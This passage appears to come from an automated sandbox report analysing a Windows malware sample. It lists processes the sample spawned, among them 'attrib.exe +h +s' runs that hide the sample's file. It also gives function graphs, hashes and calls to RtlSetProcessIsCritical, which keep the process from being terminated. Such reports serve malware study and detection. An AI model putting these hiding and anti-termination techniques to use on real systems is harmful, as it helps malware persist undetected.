                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:42
                                        Start time:04:22:38
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:43
                                        Start time:04:22:39
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:44
                                        Start time:04:22:56
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:13.7%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:12
                                          Total number of Limit Nodes:0
                                          execution_graph 22569 4f422a4 22570 4f4229e 22569->22570 22570->22569 22571 4f4223f 22570->22571 22574 7dcf540 22570->22574 22578 7dcf530 22570->22578 22575 7dcf55c 22574->22575 22582 7dc8e8c 22575->22582 22579 7dcf540 22578->22579 22580 7dc8e8c RtlSetProcessIsCritical 22579->22580 22581 7dcf5ae 22580->22581 22581->22571 22583 7dcf610 RtlSetProcessIsCritical 22582->22583 22585 7dcf5ae 22583->22585 22585->22571

                                          Executed Functions

                                          Function 07DC7598 Relevance: 11.8, Strings: 9, Instructions: 527COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2116 7dc7598-7dc761c 2125 7dc76c7-7dc76f3 2116->2125 2126 7dc7622-7dc76c0 call 7dc3570 call 7dc71e0 call 7dc7508 call 7dc7198 2116->2126 2130 7dc7764-7dc776d 2125->2130 2126->2125 2133 7dc776f-7dc7779 2130->2133 2134 7dc76f5-7dc76f8 2130->2134 2135 7dc7799 2133->2135 2136 7dc777b-7dc7785 2133->2136 2137 7dc76fa-7dc7702 2134->2137 2138 7dc7704-7dc7707 2134->2138 2139 7dc77a0-7dc792f call 7dc7550 call 7dc7198 call 7dc71e0 2135->2139 2141 7dc7787-7dc778e 2136->2141 2142 7dc7790-7dc7797 2136->2142 2143 7dc770a-7dc7713 2137->2143 2138->2143 2257 7dc796c-7dc79de 2139->2257 2258 7dc7931-7dc7937 2139->2258 2141->2139 2142->2139 2144 7dc79df-7dc7a07 2143->2144 2145 7dc7719-7dc773c call 7dc7228 call 7dc74c0 2143->2145 2151 7dc7a2d-7dc7a3d 2144->2151 2152 7dc7a09-7dc7a2b 2144->2152 2145->2144 2158 7dc7742-7dc774b 2145->2158 2163 7dc7a40-7dc7a49 2151->2163 2152->2163 2273 7dc774d call 7dc7598 2158->2273 2274 7dc774d call 7dc758b 2158->2274 2167 7dc7a6b-7dc7a73 2163->2167 2168 7dc7a4b-7dc7a51 2163->2168 2165 7dc7753-7dc7755 2170 7dc7757-7dc7759 2165->2170 2171 7dc7760-7dc7761 2165->2171 2172 7dc7a74-7dc7ab1 2168->2172 2173 7dc7a53-7dc7a69 2168->2173 2170->2171 2171->2130 2185 7dc7b38-7dc7b57 2172->2185 2186 7dc7ab7-7dc7b33 2172->2186 2173->2167 2173->2168 2196 7dc7b9e-7dc7ba9 2185->2196 2197 7dc7b59-7dc7b99 2185->2197 2228 7dc7c1b-7dc7c22 2186->2228 2206 7dc7bca 2196->2206 2207 7dc7bab-7dc7bb1 2196->2207 2197->2228 2210 7dc7bd3-7dc7be6 2206->2210 2207->2206 2209 7dc7bb3-7dc7bb6 2207->2209 2209->2206 2213 7dc7bb8-7dc7bbb 2209->2213 2210->2228 2213->2206 2215 7dc7bbd-7dc7bc0 2213->2215 2215->2206 2217 7dc7bc2-7dc7bc8 2215->2217 2217->2206 2220 7dc7be8-7dc7bea 2217->2220 2224 7dc7bec-7dc7bef 2220->2224 2225 7dc7bf3-7dc7bf5 2220->2225 2229 7dc7bf7-7dc7c17 2224->2229 2230 7dc7bf1-7dc7c19 2224->2230 2225->2228 2229->2228 2230->2228 2258->2144 2259 7dc793d-7dc7947 2258->2259 2259->2144 2260 7dc794d-7dc795b 2259->2260 2264 7dc795d-7dc795f 2260->2264 2265 7dc7966-7dc796a 2260->2265 2264->2265 2265->2257 2265->2258 2273->2165 2274->2165
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551628689.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7dc0000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: /pq$"Jp$"Jp$"Jp$"Jp$"Jp$(Bp$^Jp$$jq
                                          • API String ID: 0-1161702195
                                          • Opcode ID: ec7c79106c14dbc5fec39d0ba286c7d2d682ac3880b55ba2689fde5c9f928ee0
                                          • Instruction ID: 888a63722aac524257106934570104bc2e244d48713d55afe94bfef7f6114a2c
                                          • Opcode Fuzzy Hash: ec7c79106c14dbc5fec39d0ba286c7d2d682ac3880b55ba2689fde5c9f928ee0
                                          • Instruction Fuzzy Hash: F81249B4B00206CFCB14DB69D994A6EBBF7EF88310B14856DD40ADB3A5DA34EC45CB91
                                          Function 04F4EC78 Relevance: 1.8, Strings: 1, Instructions: 526COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2392 4f4ec78-4f4ecac 2395 4f4ecae-4f4ecb7 2392->2395 2396 4f4ecba-4f4eccd 2392->2396 2395->2396 2397 4f4ecd3-4f4ecd6 2396->2397 2398 4f4ef3d-4f4ef41 2396->2398 2399 4f4ece5-4f4ecf1 2397->2399 2400 4f4ecd8-4f4ecdd 2397->2400 2401 4f4ef56-4f4ef60 2398->2401 2402 4f4ef43-4f4ef53 2398->2402 2404 4f4ecf7-4f4ed09 2399->2404 2405 4f4ef7b-4f4efc1 2399->2405 2400->2399 2402->2401 2409 4f4ee75-4f4ee83 2404->2409 2410 4f4ed0f-4f4ed62 2404->2410 2417 4f4efd0-4f4eff8 2405->2417 2418 4f4efc3-4f4efcd 2405->2418 2415 4f4ef08-4f4ef0a 2409->2415 2416 4f4ee89-4f4ee97 2409->2416 2439 4f4ed64-4f4ed70 call 4f4e9b8 2410->2439 2440 4f4ed72 2410->2440 2421 4f4ef0c-4f4ef12 2415->2421 2422 4f4ef18-4f4ef24 2415->2422 2419 4f4eea6-4f4eeb2 2416->2419 2420 4f4ee99-4f4ee9e 2416->2420 2441 4f4f14d-4f4f16b 2417->2441 2442 4f4effe-4f4f017 2417->2442 2418->2417 2419->2405 2426 4f4eeb8-4f4eee7 2419->2426 2420->2419 2424 4f4ef14 2421->2424 2425 4f4ef16 2421->2425 2432 4f4ef26-4f4ef37 2422->2432 2424->2422 2425->2422 2443 4f4eef8-4f4ef06 2426->2443 2444 4f4eee9-4f4eef6 2426->2444 2432->2397 2432->2398 2446 4f4ed74-4f4ed84 2439->2446 2440->2446 2459 4f4f1d6-4f4f1e0 2441->2459 2460 4f4f16d-4f4f18f 2441->2460 2457 4f4f01d-4f4f033 2442->2457 2458 4f4f12e-4f4f147 2442->2458 2443->2398 2444->2443 2454 4f4ed86-4f4ed9d 2446->2454 2455 4f4ed9f-4f4eda1 2446->2455 2454->2455 2461 4f4eda3-4f4edb1 2455->2461 2462 4f4edea-4f4edec 2455->2462 2457->2458 2483 4f4f039-4f4f087 2457->2483 2458->2441 2458->2442 2480 4f4f1e1-4f4f232 call 4f4a618 2460->2480 2481 4f4f191-4f4f1ad 2460->2481 2461->2462 2471 4f4edb3-4f4edc5 2461->2471 2464 4f4edee-4f4edf8 2462->2464 2465 4f4edfa-4f4ee0a 2462->2465 2464->2465 2479 4f4ee43-4f4ee4f 2464->2479 2474 4f4ee35-4f4ee3b call 4f4f5c8 2465->2474 2475 4f4ee0c-4f4ee1a 2465->2475 2485 4f4edc7-4f4edc9 2471->2485 2486 4f4edcb-4f4edcf 2471->2486 2487 4f4ee41 2474->2487 2490 4f4ee1c-4f4ee2b 2475->2490 2491 4f4ee2d-4f4ee30 2475->2491 2479->2432 2495 4f4ee55-4f4ee70 2479->2495 2513 4f4f234-4f4f250 call 4f4a0c0 2480->2513 2514 4f4f252-4f4f290 call 4f49358 * 3 2480->2514 2496 4f4f1d1-4f4f1d4 2481->2496 2523 4f4f0b1-4f4f0d5 2483->2523 2524 4f4f089-4f4f0af 2483->2524 2492 4f4edd5-4f4ede4 2485->2492 2486->2492 2487->2479 2490->2479 2491->2398 2492->2462 2504 4f4ef61-4f4ef74 2492->2504 2495->2398 2496->2459 2499 4f4f1bb-4f4f1be 2496->2499 2499->2480 2503 4f4f1c0-4f4f1d0 2499->2503 2503->2496 2504->2405 2513->2514 2536 4f4f107-4f4f120 2523->2536 2537 4f4f0d7-4f4f0ee 2523->2537 2524->2523 2540 4f4f122 2536->2540 2541 4f4f12b 2536->2541 2543 4f4f0f0-4f4f0f3 2537->2543 2544 4f4f0fa-4f4f105 2537->2544 2540->2541 2541->2458 2543->2544 2544->2536 2544->2537
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $jq
                                          • API String ID: 0-2886413773
                                          • Opcode ID: ec1e5c2d001bcce8f590039cd1eb1b4e68587887d90afbc6c91bc1658810fbe8
                                          • Instruction ID: b2082996c9b8cb6c0d9af4eca63509fe8485f13f69442f74102ac89b0d9a70ac
                                          • Opcode Fuzzy Hash: ec1e5c2d001bcce8f590039cd1eb1b4e68587887d90afbc6c91bc1658810fbe8
                                          • Instruction Fuzzy Hash: 6E124A34B002159FCB14DF69C9549AEBBB6FF88310B158169E906EB365DF34EC02CBA0
                                          Function 07DCD618 Relevance: 1.6, Strings: 1, Instructions: 354COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2578 7dcd618-7dcd6bd 2580 7dcd6bf-7dcd6e6 2578->2580 2581 7dcd739-7dcd747 2578->2581 2580->2581 2585 7dcd6e8-7dcd6fc 2580->2585 2582 7dcd74a-7dcd812 2581->2582 2598 7dcd88b-7dcd899 2582->2598 2599 7dcd814-7dcd83b 2582->2599 2588 7dcd6fe-7dcd708 2585->2588 2589 7dcd71f-7dcd737 2585->2589 2591 7dcd70c-7dcd71b 2588->2591 2592 7dcd70a 2588->2592 2589->2582 2591->2591 2593 7dcd71d 2591->2593 2592->2591 2593->2589 2600 7dcd89c-7dcd8d0 2598->2600 2599->2598 2603 7dcd83d-7dcd851 2599->2603 2604 7dcd949-7dcd957 2600->2604 2605 7dcd8d2-7dcd8f9 2600->2605 2609 7dcd874-7dcd889 2603->2609 2610 7dcd853-7dcd85d 2603->2610 2607 7dcd95a-7dcd9de 2604->2607 2605->2604 2611 7dcd8fb-7dcd90f 2605->2611 2623 7dcd9e7-7dcda52 2607->2623 2624 7dcd9e0-7dcd9e6 2607->2624 2609->2600 2612 7dcd85f 2610->2612 2613 7dcd861-7dcd870 2610->2613 2618 7dcd911-7dcd91b 2611->2618 2619 7dcd932-7dcd947 2611->2619 2612->2613 2613->2613 2615 7dcd872 2613->2615 2615->2609 2621 7dcd91d 2618->2621 2622 7dcd91f-7dcd92e 2618->2622 2619->2607 2621->2622 2622->2622 2625 7dcd930 2622->2625 2631 7dcda5a-7dcdaab 2623->2631 2624->2623 2625->2619 2634 7dcdaad-7dcdab1 2631->2634 2635 7dcdabb-7dcdabf 2631->2635 2634->2635 2636 7dcdab3 2634->2636 2637 7dcdacf-7dcdad3 2635->2637 2638 7dcdac1-7dcdac5 2635->2638 2636->2635 2640 7dcdad5-7dcdad9 2637->2640 2641 7dcdae3-7dcdae7 2637->2641 2638->2637 2639 7dcdac7 2638->2639 2639->2637 2640->2641 2644 7dcdadb 2640->2644 2642 7dcdae9-7dcdaed 2641->2642 2643 7dcdaf7-7dcdafb 2641->2643 2642->2643 2645 7dcdaef 2642->2645 2646 7dcdafd-7dcdb01 2643->2646 2647 7dcdb0b-7dcdb0f 2643->2647 2644->2641 2645->2643 2646->2647 2648 7dcdb03 2646->2648 2649 7dcdb1f 2647->2649 2650 7dcdb11-7dcdb15 2647->2650 2648->2647 2652 7dcdb20 2649->2652 2650->2649 2651 7dcdb17 2650->2651 2651->2649 2652->2652
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551628689.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7dc0000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \V=m
                                          • API String ID: 0-2437245023
                                          • Opcode ID: c4a27d890b714a56b7e6ca21b4809e57fdb686e20b65080df850d6a967b0a004
                                          • Instruction ID: c2b3745755a9f2f956521f084e4382abb261a2895e9f890e3a9dacb2b81f73cc
                                          • Opcode Fuzzy Hash: c4a27d890b714a56b7e6ca21b4809e57fdb686e20b65080df850d6a967b0a004
                                          • Instruction Fuzzy Hash: F4E1E4B4E00219CFEB60DFA9CD81B9DFBB2BF49304F1481AAD409A7250DB749A85CF55
                                          Function 07C32153 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551195597.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7c30000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: ea35a44a2c7edadbd8b63992240f399b5137c8464f0dd295a07c000536773b54
                                          • Instruction ID: 75dc62fc98d5e3370f36cdf99b6b5e04f1d3ed3977000f406a6aceb9f1eb9e44
                                          • Opcode Fuzzy Hash: ea35a44a2c7edadbd8b63992240f399b5137c8464f0dd295a07c000536773b54
                                          • Instruction Fuzzy Hash: F581E674E00248CFDB45DFA9C89499DBBB2BF4A310F2590AAE805AB365DB31AC05CF50
                                          Function 04F41541 Relevance: .4, Instructions: 422COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40780ed89b8cebaa0ecab5bf77ccc0745f27eba0dd1840243e6b2a6c35b21fab
                                          • Instruction ID: 80a128e85ef2765b17ca268631c21d45bc8bbf5ef2330f930434ab3e9ed2a6ed
                                          • Opcode Fuzzy Hash: 40780ed89b8cebaa0ecab5bf77ccc0745f27eba0dd1840243e6b2a6c35b21fab
                                          • Instruction Fuzzy Hash: A922F074E00228CFDB64DF65D988B9DBBB2FF88311F1084A9D809A7265DB346E85CF50
                                          Function 04F41550 Relevance: .4, Instructions: 419COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5ed15facc660dada83833fe99a6bb12e178983ab4942c3230d6d7c7d8459652d
                                          • Instruction ID: e386fb394c743f132bade0f0fbd74fa035262377bbcdd80272e5d6c1e4757fe1
                                          • Opcode Fuzzy Hash: 5ed15facc660dada83833fe99a6bb12e178983ab4942c3230d6d7c7d8459652d
                                          • Instruction Fuzzy Hash: 4222EF74E00228CFDB64DF65D988B9DBBB2FF88311F1084A9D909A7265DB346E85CF50
                                          Function 07DCE998 Relevance: .4, Instructions: 387COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551628689.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7dc0000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e44b326eb722c2385267f6c7ac7427f021c509870d8ddc6b4962b63731f8ad97
                                          • Instruction ID: 80d3727fd68ede0c5f6f6e728e9327159d8f122469a2356776ca4ef14936a8fa
                                          • Opcode Fuzzy Hash: e44b326eb722c2385267f6c7ac7427f021c509870d8ddc6b4962b63731f8ad97
                                          • Instruction Fuzzy Hash: BAF1E5B0D0021ACFDB20CFA8C985B9DFBF1BF49300F1495AAD509A7254EB749985CF55
                                          Function 04F4316F Relevance: .3, Instructions: 327COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54ec7b12b4b86c0784c5391ad0e2b01932e91738ef05b280206d8b04a101787d
                                          • Instruction ID: 95bce228b5916ac4fcdc79b0a496df7ee72958756227b1c32a95a739efc042aa
                                          • Opcode Fuzzy Hash: 54ec7b12b4b86c0784c5391ad0e2b01932e91738ef05b280206d8b04a101787d
                                          • Instruction Fuzzy Hash: C0F1C274A00228DFDB65DF65D944B9DBBB2FF88310F1081AAD909A7365DB346E82DF40
                                          Function 07DC87E8 Relevance: .2, Instructions: 193COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551628689.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7dc0000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c4552d93a2e9c05892f31684e2a77beae1720239455e80122e6c0d34b07fc198
                                          • Instruction ID: e3db80d758331d52bddf365ca528736413fbbd5c177263fbb8adb75b7b7d8839
                                          • Opcode Fuzzy Hash: c4552d93a2e9c05892f31684e2a77beae1720239455e80122e6c0d34b07fc198
                                          • Instruction Fuzzy Hash: 60517270B402099FD744EBBAD950B6EBAEBBFC8344F248428D506DB3A4DE749C4587A4
                                          Function 04F4AD68 Relevance: 44.3, Strings: 33, Instructions: 3080COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 4f4ad68-4f4adaa 4 4f4adb4-4f4e277 0->4 696 4f4e2c1-4f4e2c8 4->696 697 4f4e279-4f4e290 696->697 698 4f4e2ca-4f4e2cf 696->698 699 4f4e2d0-4f4e30a 697->699 700 4f4e292-4f4e2be 697->700 700->696
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $#jq$(:Cp$(Aoq$(ojq$, jq$,nq$,nq$0"jq$09Cp$4'jq$4cjq$H;Cp$Hbkq$LRjq$LdCp$PHjq$Ppjq$X#jq$\;jq$\sjq$p jq$p<jq$pBoq$p`jq$x oq$xnq$|bkq$|oq$oq$$jq$:Cp$;jq$cjq
                                          • API String ID: 0-1306457518
                                          • Opcode ID: 0cf7cdefe74b34beff66b5689b5be89f74108340fd662c060dbd30816b301c44
                                          • Instruction ID: 5213213ffaa4cffdaac09fc701eb45ac2cdef1c4fb61dfdafbaeae010ae7195c
                                          • Opcode Fuzzy Hash: 0cf7cdefe74b34beff66b5689b5be89f74108340fd662c060dbd30816b301c44
                                          • Instruction Fuzzy Hash: 73532E70B80318AFEB169B64DC11B9DBB7BEF49300F1040D9EA096B2A4CB756E84DF15
                                          Function 04F4AD43 Relevance: 44.3, Strings: 33, Instructions: 3047COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 705 4f4ad43-4f4ad9a 710 4f4ada5-4f4adaa 705->710 711 4f4adb4-4f4e277 710->711 1403 4f4e2c1-4f4e2c8 711->1403 1404 4f4e279-4f4e290 1403->1404 1405 4f4e2ca-4f4e2cf 1403->1405 1406 4f4e2d0-4f4e30a 1404->1406 1407 4f4e292-4f4e2be 1404->1407 1407->1403
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $#jq$(:Cp$(Aoq$(ojq$, jq$,nq$,nq$0"jq$09Cp$4'jq$4cjq$H;Cp$Hbkq$LRjq$LdCp$PHjq$Ppjq$X#jq$\;jq$\sjq$p jq$p<jq$pBoq$p`jq$x oq$xnq$|bkq$|oq$oq$$jq$:Cp$;jq$cjq
                                          • API String ID: 0-1306457518
                                          • Opcode ID: c6b4e0f456108ead5d9154e88b0b6251e236b92d3efa281c9c17e4cf6a8a0d20
                                          • Instruction ID: 72bb92673c7bdc59caf42970d1049133a5bbd893ef250ae675d0b0b490fb28f0
                                          • Opcode Fuzzy Hash: c6b4e0f456108ead5d9154e88b0b6251e236b92d3efa281c9c17e4cf6a8a0d20
                                          • Instruction Fuzzy Hash: 72532E70B80318AFEB169B64DD11B9DBA7BEF49300F1040D9EA096B2E4CB756E84DF15
                                          Function 04F4AD3F Relevance: 44.3, Strings: 33, Instructions: 3017COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1412 4f4ad3f-4f4ad9b 1414 4f4ada5-4f4adaa 1412->1414 1415 4f4adb4-4f4e277 1414->1415 2107 4f4e2c1-4f4e2c8 1415->2107 2108 4f4e279-4f4e290 2107->2108 2109 4f4e2ca-4f4e2cf 2107->2109 2110 4f4e2d0-4f4e30a 2108->2110 2111 4f4e292-4f4e2be 2108->2111 2111->2107
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4547598882.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4f40000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $#jq$(:Cp$(Aoq$(ojq$, jq$,nq$,nq$0"jq$09Cp$4'jq$4cjq$H;Cp$Hbkq$LRjq$LdCp$PHjq$Ppjq$X#jq$\;jq$\sjq$p jq$p<jq$pBoq$p`jq$x oq$xnq$|bkq$|oq$oq$$jq$:Cp$;jq$cjq
                                          • API String ID: 0-1306457518
                                          • Opcode ID: f91881b208db8f451de225e5e2b72a53b84089987796969109aa2a813f77c39d
                                          • Instruction ID: 8d00714a477ee83742c8722baffa61f3b4ee04abbc4c0958e68b63457ff053df
                                          • Opcode Fuzzy Hash: f91881b208db8f451de225e5e2b72a53b84089987796969109aa2a813f77c39d
                                          • Instruction Fuzzy Hash: 4B532F70B80318AFEB269B64DD11B9DBA7BEF49300F1040D5EA096B2E4CB756E84DF15
                                          Function 07C32FD8 Relevance: 1.8, Strings: 1, Instructions: 516COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2547 7c32fd8-7c332a0 2549 7c332a2 2547->2549 2550 7c332a7-7c333f1 2547->2550 2549->2550 2566 7c333f7-7c33479 call 7c32694 2550->2566 2574 7c33485 2566->2574 2575 7c3347b-7c33484 2566->2575 2576 7c33486 2574->2576 2575->2574 2576->2576
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551195597.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7c30000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: 01e27e7ab4fd3254672e9e53c1f47c95bd5219284fe6ffee6bfdabdc4b756a7d
                                          • Instruction ID: 3e27bb24042eccdef1085bb83306dc4a4a5ff44cc1725352e0b24f9ebd7dfbb1
                                          • Opcode Fuzzy Hash: 01e27e7ab4fd3254672e9e53c1f47c95bd5219284fe6ffee6bfdabdc4b756a7d
                                          • Instruction Fuzzy Hash: 2881A074E10218DFDB04DFA9D994A9DBBB2FF89310F209169E809AB365DB30AC41CF50
                                          Function 07DC8E8C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2728 7dc8e8c-7dcf6d7 RtlSetProcessIsCritical 2731 7dcf6de-7dcf717 2728->2731 2732 7dcf6d9 2728->2732 2732->2731
                                          APIs
                                          • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 07DCF6C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551628689.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7dc0000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID: CriticalProcess
                                          • String ID:
                                          • API String ID: 2695349919-0
                                          • Opcode ID: 9bec5c44fb484015955247a50447dcefb184b03ff4f64c7c9f2571d23c015cbd
                                          • Instruction ID: 61eb1c47b6843de4247e7c35eac8d29b64e5f4aa75fe24ad7addb16cc50007d3
                                          • Opcode Fuzzy Hash: 9bec5c44fb484015955247a50447dcefb184b03ff4f64c7c9f2571d23c015cbd
                                          • Instruction Fuzzy Hash: 5A31F0B5D04259DFDB10CFAAD484AEEFBF5AF09310F14906AE854B3250C738AA45CFA4
                                          Function 07DCF609 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2735 7dcf609-7dcf650 2736 7dcf658-7dcf6d7 RtlSetProcessIsCritical 2735->2736 2737 7dcf6de-7dcf717 2736->2737 2738 7dcf6d9 2736->2738 2738->2737
                                          APIs
                                          • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 07DCF6C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4551628689.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7dc0000_DQmU06kq9I.jbxd
                                          Similarity
                                          • API ID: CriticalProcess
                                          • String ID:
                                          • API String ID: 2695349919-0
                                          • Opcode ID: ef201842e9f12dd22272671256fb4a75a865281de8243851c9316f3364fed65b
                                          • Instruction ID: 02c117cab30bb5fe92de6823f07f8216c510595216052e9d79e1abe33a35a90c
                                          • Opcode Fuzzy Hash: ef201842e9f12dd22272671256fb4a75a865281de8243851c9316f3364fed65b
                                          • Instruction Fuzzy Hash: 5231DDB5D04259DFDB10CFAAD484AEEFBF5AF09310F14906AE854B3250C738AA45CFA4
                                          Function 04F49BB0 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
